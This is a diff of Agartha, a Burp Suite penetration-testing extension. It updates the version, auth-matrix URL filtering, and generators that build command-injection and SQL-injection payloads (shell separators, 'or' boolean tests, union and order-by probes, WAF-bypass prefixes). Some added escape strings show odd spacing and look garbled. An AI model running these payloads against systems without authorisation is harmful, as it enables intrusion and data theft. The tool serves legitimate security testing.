skipped 15 lines 16 16 except: 17 17 print "==== ERROR ====" + "\n\nFailed to load dependencies.\n" +str(sys.exc_info()[1]) +"\n\n==== ERROR ====\n\n" 18 18 19 - VERSION = "0.9 " 19 + VERSION = "0.92 " 20 20 21 21 class BurpExtender(IBurpExtender, ITab, IMessageEditorController, IContextMenuFactory): 22 22 skipped 123 lines 146 146 return 147 147 self._tbAuthNewUser.setForeground (Color.black) 148 148 149 - if self.userCount == 0: 150 - # header for unauth user 151 - unauthHeader = self._tbAuthHeader.getText().split('\n')[0] + "\n" + self._tbAuthHeader.getText().split('\n')[1] 152 - for line in self._tbAuthHeader.getText().split('\n')[2:]: 153 - if not any(re.findall(r'cookie|token|auth', line, re.IGNORECASE)): 154 - unauthHeader += "\n" + line 155 - if not line: 156 - break 157 - self.userNamesHttpReq[0] = unauthHeader 158 - 159 - self.userCount = self.userCount + 1 160 - self.userNames.append(self._tbAuthNewUser.text) 161 - self.userNamesHttpReq.append(self._tbAuthHeader.getText()) 162 - self.tableMatrix_DM.addColumn(self._tbAuthNewUser.text) 163 - self.userNamesHttpUrls.append([]) 164 - 165 149 urlList = [] 166 - for x in range(0,self.tableMatrix.getRowCount()): 150 + for x in range(0, self.tableMatrix.getRowCount()): 167 151 urlList.append(str(self.tableMatrix.getValueAt(x, 0))) 168 - 169 152 for _url in set(self._tbAuthURL.getText().split('\n')): 170 153 _url = _url.strip() 171 - if _url and not any(re.findall(r'(log|sign).*(off|out)', _url, re.IGNORECASE)): 154 + _ext = os.path.splitext(urlparse.urlparse(_url).path)[1] 155 + if _url and not any(re.findall(r'(log|sign).*(off|out)', _url, re.IGNORECASE)) and not any(re.findall(r'^\.(gif|jpg|jpeg|png|css|js|ico|svg|eot|woff|woff2|ttf)$', _ext, re.IGNORECASE)): 172 156 # ignore logout, signoff, etc. paths 173 157 if _url not in self.userNamesHttpUrls[self.userCount]: 174 158 # check first if the url exist in user's url list skipped 2 lines 177 161 # check table if url exists 178 162 self.tableMatrix_DM.addRow([_url]) 179 163 180 - self._tbAuthURL.setText("") 181 - self._btnAuthRun.setEnabled(True) 182 - self._btnAuthReset.setEnabled(True) 183 - self._lblAuthNotification.text = self._tbAuthNewUser.text + " added successfully!" 184 - self._lblAuthNotification.setForeground (Color.black) 185 - self._cbAuthColoring.setEnabled(True) 186 - self._cbAuthGETPOST.setEnabled(True) 187 - self.tableMatrix.repaint() 188 - self.tableMatrix.setSelectionForeground(Color.red) 189 - self._customRenderer = UserEnabledRenderer(self.tableMatrix.getDefaultRenderer(str), self.userNamesHttpUrls) 190 - self._customTableColumnModel = self.tableMatrix.getColumnModel() 191 - for y in range(0,self.tableMatrix.getColumnCount()): 192 - self._customTableColumnModel.getColumn (y).setCellRenderer (self._customRenderer) 164 + 165 + if self.tableMatrix_DM.getRowCount() > 0: 166 + if self.userCount == 0: 167 + # header for unauth user 168 + unauthHeader = self._tbAuthHeader.getText().split('\n')[0] + "\n" + self._tbAuthHeader.getText().split('\n')[1] 169 + for line in self._tbAuthHeader.getText().split('\n')[2:]: 170 + if not any(re.findall(r'cookie|token|auth', line, re.IGNORECASE)): 171 + unauthHeader += "\n" + line 172 + if not line: 173 + break 174 + self.userNamesHttpReq[0] = unauthHeader 175 + 176 + self.userCount = self.userCount + 1 177 + self.userNames.append(self._tbAuthNewUser.text) 178 + self.userNamesHttpReq.append(self._tbAuthHeader.getText()) 179 + self.tableMatrix_DM.addColumn(self._tbAuthNewUser.text) 180 + self.userNamesHttpUrls.append([]) 193 181 182 + self._tbAuthURL.setText("") 183 + self._btnAuthRun.setEnabled(True) 184 + self._btnAuthReset.setEnabled(True) 185 + self._lblAuthNotification.text = self._tbAuthNewUser.text + " added successfully! Possible session terminator (log|sign.*off|out) URLs, and file extensions (gif, jpg, jpeg, png, css, js, ico, svg, eot, woff, woff2, ttf) have been filtered out!" 186 + self._lblAuthNotification.setForeground (Color.black) 187 + self._cbAuthColoring.setEnabled(True) 188 + self._cbAuthGETPOST.setEnabled(True) 189 + self.tableMatrix.repaint() 190 + self.tableMatrix.setSelectionForeground(Color.red) 191 + self._customRenderer = UserEnabledRenderer(self.tableMatrix.getDefaultRenderer(str), self.userNamesHttpUrls) 192 + self._customTableColumnModel = self.tableMatrix.getColumnModel() 193 + for y in range(0,self.tableMatrix.getColumnCount()): 194 + self._customTableColumnModel.getColumn (y).setCellRenderer (self._customRenderer) 195 + else: 196 + self._lblAuthNotification.text = "URL list possibly contains session terminators (log|sign.*off|out), or any of file extensions (gif, jpg, jpeg, png, css, js, ico, svg, eot, woff, woff2, ttf)!" 197 + self._lblAuthNotification.setForeground (Color.red) 194 198 return 195 199 196 200 def _cbAuthColoringFunc(self, ev): skipped 83 lines 280 284 281 285 def funcCommandInj(self, ev): 282 286 listCommandInj = [] 283 - prefixes = ["", "\\n", "\\r\\n", "%0a", "%0d%0a"] 284 - escapeChars = ["", "'", "\\'", "\"", "\\\""] 287 + prefixes = ["", "\\n", "\\\ \ n " , " \ \ r\ \ n " , " \ \ \ \ r \ \ \\n", "%0a", "%0d%0a"] 288 + escapeChars = ["", "'", "\\'", "\\ \ \ ' " , " \ "", "\ \ \ " " , " \ \ \\\""] 285 289 separators = ["&", "&&", "|", "||", ";"] 286 290 287 291 for prefix in prefixes: 288 292 for separator in separators: 289 293 for escapeChar in escapeChars: 294 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 295 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 296 + continue 290 297 listCommandInj.append(prefix + escapeChar + separator + self._txtTargetPath.text + separator + escapeChar + "\n") 291 298 listCommandInj.append(prefix + escapeChar + separator + self._txtTargetPath.text + escapeChar + "\n") 292 299 listCommandInj.append(prefix + escapeChar + separator + escapeChar + self._txtTargetPath.text + "\n") skipped 110 lines 403 410 return 404 411 405 412 listSQLi = [] 406 - prefixes = ["", "\\n", "\\r\\n", "%0a", "0x0a", "%0d%0a", "0x0d0a", "%00", "0x00"] 407 - escapeChars = ["", "'", "\\'"] 413 + prefixes = ["", "\\n", "\\\ \ n " , " \ \ r\ \ n " , " \ \ \ \ r \ \ \\n", "%0a", "0x0a", "%0d%0a", "0x0d0a", "%00", "0x00"] 414 + escapeChars = ["", "'", "\\'", " \ \ \ \ ' " ] 408 415 if not self._cbSqlWafBypass.isSelected(): 409 416 prefixes = [""] 410 417 escapeChars = ["", "'"] 411 - 412 418 n1 = str(random.randint(10, 70)) 413 419 n2 = str(random.randint(71, 99)) 414 420 boolExpressions = [n1 + "=" + n1, n1 + "<" + n2] skipped 5 lines 420 426 for escapeChar in escapeChars: 421 427 for boolExpression in boolExpressions: 422 428 for suffix in suffixes[1:]: 429 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 430 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 431 + continue 423 432 listSQLi.append(prefix + escapeChar + " or " + boolExpression + suffix + "\n") 424 433 if not escapeChar: 425 434 listSQLi.append(prefix + " or " + boolExpression + "\n") 426 435 for prefix in prefixes: 427 436 for escapeChar in escapeChars[1:]: 428 437 for suffix in suffixes[1:]: 438 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 439 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 440 + continue 429 441 listSQLi.append(prefix + escapeChar + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + "\n") 430 442 listSQLi.append(prefix + escapeChar + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + suffix + "\n") 431 443 listSQLi.append(prefix + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + "\n") 432 444 listSQLi.append(prefix + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + suffix + "\n") 433 - 434 445 435 446 if self._cbOrderBased.isSelected(): 436 447 for prefix in prefixes: 437 448 for escapeChar in escapeChars: 438 449 for suffix in suffixes[1:]: 439 450 for i in range(int(self._cbOrderDepth.getSelectedItem())): 451 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 452 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 453 + continue 440 454 listSQLi.append(prefix + escapeChar + " order by " + str(i+1) + suffix + "\n") 441 455 if not escapeChar: 442 456 listSQLi.append(prefix + escapeChar + " order by " + str(i+1) + "\n") skipped 4 lines 447 461 for escapeChar in escapeChars: 448 462 for suffix in suffixes[1:]: 449 463 for union in unions: 464 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 465 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 466 + continue 450 467 unionPhrase = " union all select " 451 468 for i in range(int(self._cbUnionDepth.getSelectedItem())): 452 469 unionPhrase += union skipped 65 lines 518 535 for prefix in prefixes: 519 536 for escapeChar in escapeChars: 520 537 for suffix in suffixes[1:]: 538 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 539 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 540 + continue 521 541 if self._cbOracleBased.isSelected(): 522 542 if self._cbStackedSQL.isSelected(): 523 543 if escapeChar: skipped 328 lines 852 872 self.editorPaneInfo.setContentType("text/html"); 853 873 htmlString ="<html>" 854 874 htmlString +="<div><h3>Author: Volkan Dindar, Github Repo: https://github.com/volkandindar/agartha</h3>" 855 - htmlString +="<h1>Agartha { LFI | RCE | Auth | SQL Injection | Http->Js }</h1>" 875 + htmlString +="<h1>Agartha { LFI | RCE | SQLi | Auth | Http->Js }</h1>" 856 876 htmlString +="<p>Agartha is a penetration testing tool which creates dynamic payload lists and user access matrix to reveal injection flaws and authentication/authorization issues. There are many different attack payloads alredy exist, but Agartha creates run-time, systematic and vendor-neutral payloads with many different possibilities and bypassing methods. It also draws attention to user session and URL relationships, which makes easy to find user access violations. And additionally, it converts Http requests to JavaScript to help digging up XSS issues more. In summary:</p><ul>" 857 877 htmlString +="<li><strong>Payload Generator</strong>: It creates payloads/wordlists for different attack types.<ul>" 858 878 htmlString +="<li><strong>Local File Inclusion, Directory Traversal</strong>: It creates file dictionary lists with various encoding and escaping characters.</li>" skipped 224 lines 1083 1103 self._requestViewer.setMessage("", False) 1084 1104 self._responseViewer.setMessage("", False) 1085 1105 self._lblAuthNotification.text = "Please add users to create an auth matrix" 1106 + self._lblAuthNotification.setForeground (Color.black) 1086 1107 self._tbAuthNewUser.setForeground (Color.black) 1087 1108 self._txtHeaderDefault = "GET /example HTTP/1.1\nHost: localhost.com\nAccept-Encoding: gzip,deflate\nConnection: close\nCookie: SessionID=......" 1088 1109 self._tbAuthHeader.setText(self._txtHeaderDefault) skipped 97 lines